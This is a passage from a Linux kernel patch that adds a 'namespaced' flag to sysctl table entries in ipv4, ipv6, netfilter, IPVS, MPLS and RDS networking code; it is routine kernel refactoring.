 		.extra1		= &ipv4_devconf,
 		.extra2		= &init_net,
+		.namespaced	= true,
 	},
 	{ },
 };
diff --git a/net/ipv4/ip_fragment.c b/net/ipv4/ip_fragment.c
index bbe7f72..49a62e0 100644
--- a/net/ipv4/ip_fragment.c
+++ b/net/ipv4/ip_fragment.c
@@ -729,7 +729,8 @@ static struct ctl_table ip4_frags_ns_ctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
-		.extra1		= &init_net.ipv4.frags.low_thresh
+		.extra1		= &init_net.ipv4.frags.low_thresh,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ipfrag_low_thresh",
@@ -738,7 +739,8 @@ static struct ctl_table ip4_frags_ns_ctl_table[] = {
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &zero,
-		.extra2		= &init_net.ipv4.frags.high_thresh
+		.extra2		= &init_net.ipv4.frags.high_thresh,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ipfrag_time",
@@ -746,6 +748,7 @@ static struct ctl_table ip4_frags_ns_ctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ipfrag_max_dist",
@@ -753,7 +756,8 @@ static struct ctl_table ip4_frags_ns_ctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
-		.extra1		= &zero
+		.extra1		= &zero,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c b/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
index ae1a71a..8ade484 100644
--- a/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
+++ b/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
@@ -218,6 +218,7 @@ static struct ctl_table ip_ct_sysctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0444,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_buckets",
@@ -230,6 +231,7 @@ static struct ctl_table ip_ct_sysctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_log_invalid",
@@ -238,6 +240,7 @@ static struct ctl_table ip_ct_sysctl_table[] = {
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &log_invalid_proto_min,
 		.extra2		= &log_invalid_proto_max,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv4/netfilter/nf_conntrack_proto_icmp.c b/net/ipv4/netfilter/nf_conntrack_proto_icmp.c
index c567e1b..6d5be74 100644
--- a/net/ipv4/netfilter/nf_conntrack_proto_icmp.c
+++ b/net/ipv4/netfilter/nf_conntrack_proto_icmp.c
@@ -324,6 +324,7 @@ static struct ctl_table icmp_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -334,6 +335,7 @@ static struct ctl_table icmp_compat_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c
index 1cb67de..9791f69 100644
--- a/net/ipv4/sysctl_net_ipv4.c
+++ b/net/ipv4/sysctl_net_ipv4.c
@@ -987,8 +987,10 @@ static __net_init int ipv4_sysctl_init_net(struct net *net)
 			goto err_alloc;
 
 		/* Update the variables to point into the current struct net */
-		for (i = 0; i < ARRAY_SIZE(ipv4_net_table) - 1; i++)
+		for (i = 0; i < ARRAY_SIZE(ipv4_net_table) - 1; i++) {
 			table[i].data += (void *)net - (void *)&init_net;
+			table[i].namespaced = true;
+		}
 	}
 
 	net->ipv4.ipv4_hdr = register_net_sysctl(net, "net/ipv4", table);
diff --git a/net/ipv4/xfrm4_policy.c b/net/ipv4/xfrm4_policy.c
index 41f5b50..be8436e 100644
--- a/net/ipv4/xfrm4_policy.c
+++ b/net/ipv4/xfrm4_policy.c
@@ -291,6 +291,7 @@ static struct ctl_table xfrm4_policy_table[] = {
 		.maxlen         = sizeof(int),
 		.mode           = 0644,
 		.proc_handler   = proc_dointvec,
+		.namespaced     = true,
 	},
 	{ }
 };
diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 2f1f5d4..73b01c0 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -6046,6 +6046,7 @@ static int __addrconf_sysctl_register(struct net *net, char *dev_name,
 		table[i].data += (char *)p - (char *)&ipv6_devconf;
 		table[i].extra1 = idev; /* embedded; no ref */
 		table[i].extra2 = net;
+		table[i].namespaced = true;
 	}
 
 	snprintf(path, sizeof(path), "net/ipv6/conf/%s", dev_name);
diff --git a/net/ipv6/icmp.c b/net/ipv6/icmp.c
index bd59c34..8c5d737 100644
--- a/net/ipv6/icmp.c
+++ b/net/ipv6/icmp.c
@@ -1067,6 +1067,7 @@ static struct ctl_table ipv6_icmp_table_template[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_ms_jiffies,
+		.namespaced	= true,
 	},
 	{ },
 };
diff --git a/net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c b/net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c
index 660bc10..4a45fd9 100644
--- a/net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c
+++ b/net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c
@@ -331,6 +331,7 @@ static struct ctl_table icmpv6_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv6/netfilter/nf_conntrack_reasm.c b/net/ipv6/netfilter/nf_conntrack_reasm.c
index e4347ae..b09f454 100644
--- a/net/ipv6/netfilter/nf_conntrack_reasm.c
+++ b/net/ipv6/netfilter/nf_conntrack_reasm.c
@@ -72,6 +72,7 @@ static struct ctl_table nf_ct_frag6_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_frag6_low_thresh",
@@ -80,7 +81,8 @@ static struct ctl_table nf_ct_frag6_sysctl_table[] = {
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &zero,
-		.extra2		= &init_net.nf_frag.frags.high_thresh
+		.extra2		= &init_net.nf_frag.frags.high_thresh,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_frag6_high_thresh",
@@ -88,7 +90,8 @@ static struct ctl_table nf_ct_frag6_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
-		.extra1		= &init_net.nf_frag.frags.low_thresh
+		.extra1		= &init_net.nf_frag.frags.low_thresh,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv6/sysctl_net_ipv6.c b/net/ipv6/sysctl_net_ipv6.c
index 69c50e7..9e482a2 100644
--- a/net/ipv6/sysctl_net_ipv6.c
+++ b/net/ipv6/sysctl_net_ipv6.c
@@ -30,21 +30,24 @@ static struct ctl_table ipv6_table_template[] = {
 		.data		= &init_net.ipv6.sysctl.bindv6only,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "anycast_src_echo_reply",
 		.data		= &init_net.ipv6.sysctl.anycast_src_echo_reply,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "flowlabel_consistency",
 		.data		= &init_net.ipv6.sysctl.flowlabel_consistency,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "auto_flowlabels",
@@ -53,14 +56,16 @@ static struct ctl_table ipv6_table_template[] = {
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &auto_flowlabels_min,
-		.extra2		= &auto_flowlabels_max
+		.extra2		= &auto_flowlabels_max,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "fwmark_reflect",
 		.data		= &init_net.ipv6.sysctl.fwmark_reflect,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "idgen_retries",
@@ -68,6 +73,7 @@ static struct ctl_table ipv6_table_template[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "idgen_delay",
@@ -75,20 +81,23 @@ static struct ctl_table ipv6_table_template[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "flowlabel_state_ranges",
 		.data		= &init_net.ipv6.sysctl.flowlabel_state_ranges,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_nonlocal_bind",
 		.data		= &init_net.ipv6.sysctl.ip_nonlocal_bind,
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
-		.proc_handler	= proc_dointvec
+		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv6/xfrm6_policy.c b/net/ipv6/xfrm6_policy.c
index 70a86ad..7cadc2e 100644
--- a/net/ipv6/xfrm6_policy.c
+++ b/net/ipv6/xfrm6_policy.c
@@ -321,6 +321,7 @@ static struct ctl_table xfrm6_policy_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler   = proc_dointvec,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/mpls/af_mpls.c b/net/mpls/af_mpls.c
index 5c161e7..ce00a55 100644
--- a/net/mpls/af_mpls.c
+++ b/net/mpls/af_mpls.c
@@ -863,6 +863,7 @@ static const struct ctl_table mpls_dev_table[] = {
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
 		.data		= MPLS_PERDEV_SYSCTL_OFFSET(input_enabled),
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -1648,6 +1649,7 @@ static const struct ctl_table mpls_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= mpls_platform_labels,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/ipvs/ip_vs_ctl.c b/net/netfilter/ipvs/ip_vs_ctl.c
index c3c809b..0d325cf 100644
--- a/net/netfilter/ipvs/ip_vs_ctl.c
+++ b/net/netfilter/ipvs/ip_vs_ctl.c
@@ -1734,24 +1734,28 @@ static struct ctl_table vs_vars[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "am_droprate",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "drop_entry",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_do_defense_mode,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "drop_packet",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_do_defense_mode,
+		.namespaced	= true,
 	},
 #ifdef CONFIG_IP_VS_NFCT
 	{
@@ -1759,6 +1763,7 @@ static struct ctl_table vs_vars[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= &proc_dointvec,
+		.namespaced	= true,
 	},
 #endif
 	{
@@ -1766,72 +1771,84 @@ static struct ctl_table vs_vars[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_do_defense_mode,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "snat_reroute",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= &proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_version",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= &proc_do_sync_mode,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_ports",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= &proc_do_sync_ports,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_persist_mode",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_qlen_max",
 		.maxlen		= sizeof(unsigned long),
 		.mode		= 0644,
 		.proc_handler	= proc_doulongvec_minmax,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_sock_size",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "cache_bypass",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "expire_nodest_conn",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sloppy_tcp",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sloppy_sctp",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "expire_quiescent_template",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_threshold",
@@ -1839,12 +1856,14 @@ static struct ctl_table vs_vars[] = {
 			sizeof(((struct netns_ipvs *)0)->sysctl_sync_threshold),
 		.mode		= 0644,
 		.proc_handler	= proc_do_sync_threshold,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_refresh_period",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "sync_retries",
@@ -1853,42 +1872,49 @@ static struct ctl_table vs_vars[] = {
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &zero,
 		.extra2		= &three,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nat_icmp_send",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "pmtu_disc",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "backup_only",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "conn_reuse_mode",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "schedule_icmp",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ignore_tunneled",
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 #ifdef CONFIG_IP_VS_DEBUG
 	{
diff --git a/net/netfilter/nf_conntrack_proto_generic.c b/net/netfilter/nf_conntrack_proto_generic.c
index 86dc752..3f80df5 100644
--- a/net/netfilter/nf_conntrack_proto_generic.c
+++ b/net/netfilter/nf_conntrack_proto_generic.c
@@ -148,6 +148,7 @@ static struct ctl_table generic_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -158,6 +159,7 @@ static struct ctl_table generic_compat_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/nf_conntrack_proto_sctp.c b/net/netfilter/nf_conntrack_proto_sctp.c
index 1d7ab96..c260427 100644
--- a/net/netfilter/nf_conntrack_proto_sctp.c
+++ b/net/netfilter/nf_conntrack_proto_sctp.c
@@ -654,54 +654,63 @@ static struct ctl_table sctp_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_cookie_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_cookie_echoed",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_established",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_shutdown_sent",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_shutdown_recd",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_shutdown_ack_sent",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_heartbeat_sent",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_sctp_timeout_heartbeat_acked",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -713,42 +722,49 @@ static struct ctl_table sctp_compat_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_cookie_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_cookie_echoed",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_established",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_shutdown_sent",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_shutdown_recd",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_sctp_timeout_shutdown_ack_sent",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c
index 70c8381..2ca7d20 100644
--- a/net/netfilter/nf_conntrack_proto_tcp.c
+++ b/net/netfilter/nf_conntrack_proto_tcp.c
@@ -1406,78 +1406,91 @@ static struct ctl_table tcp_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_syn_recv",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_established",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_fin_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_close_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_last_ack",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_time_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_close",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_max_retrans",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_timeout_unacknowledged",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_loose",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname       = "nf_conntrack_tcp_be_liberal",
 		.maxlen         = sizeof(unsigned int),
 		.mode           = 0644,
 		.proc_handler   = proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_tcp_max_retrans",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -1489,78 +1502,91 @@ static struct ctl_table tcp_compat_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_syn_sent2",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_syn_recv",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_established",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_fin_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_close_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_last_ack",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_time_wait",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_close",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_timeout_max_retrans",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_loose",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_be_liberal",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_tcp_max_retrans",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/nf_conntrack_proto_udp.c b/net/netfilter/nf_conntrack_proto_udp.c
index 4fd0405..ab1773f 100644
--- a/net/netfilter/nf_conntrack_proto_udp.c
+++ b/net/netfilter/nf_conntrack_proto_udp.c
@@ -209,12 +209,14 @@ static struct ctl_table udp_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_udp_timeout_stream",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -225,12 +227,14 @@ static struct ctl_table udp_compat_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_udp_timeout_stream",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/nf_conntrack_proto_udplite.c b/net/netfilter/nf_conntrack_proto_udplite.c
index 9d692f5..17bb377 100644
--- a/net/netfilter/nf_conntrack_proto_udplite.c
+++ b/net/netfilter/nf_conntrack_proto_udplite.c
@@ -224,12 +224,14 @@ static struct ctl_table udplite_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "nf_conntrack_udplite_timeout_stream",
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index aa5847a..78a69e2 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -481,6 +481,7 @@ static int netfilter_log_sysctl_init(struct net *net)
 				nf_log_proc_dostring;
 			nf_log_sysctl_table[i].extra1 =
 				(void *)(unsigned long) i;
+			nf_log_sysctl_table[i].namespaced = true;
 		}
 	}
 
diff --git a/net/rds/tcp.c b/net/rds/tcp.c
index fcddacc..74a73e8 100644
--- a/net/rds/tcp.c
+++ b/net/rds/tcp.c
@@ -68,6 +68,7 @@ static struct ctl_table rds_tcp_sysctl_table[] = {
 		.mode           = 0644,
 		.proc_handler   = rds_tcp_skbuf_handler,
 		.extra1		= &rds_tcp_min_sndbuf,
+		.namespaced	= true,
 	},
 #define	RDS_TCP_RCVBUF	1
 	{
@@ -77,6 +78,7 @@ static struct ctl_table rds_tcp_sysctl_table[] = {
 		.mode           = 0644,
 		.proc_handler   = rds_tcp_skbuf_handler,
 		.extra1		= &rds_tcp_min_rcvbuf,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/sctp/sysctl.c b/net/sctp/sysctl.c
index daf8554..5d676e8 100644
--- a/net/sctp/sysctl.c
+++ b/net/sctp/sysctl.c
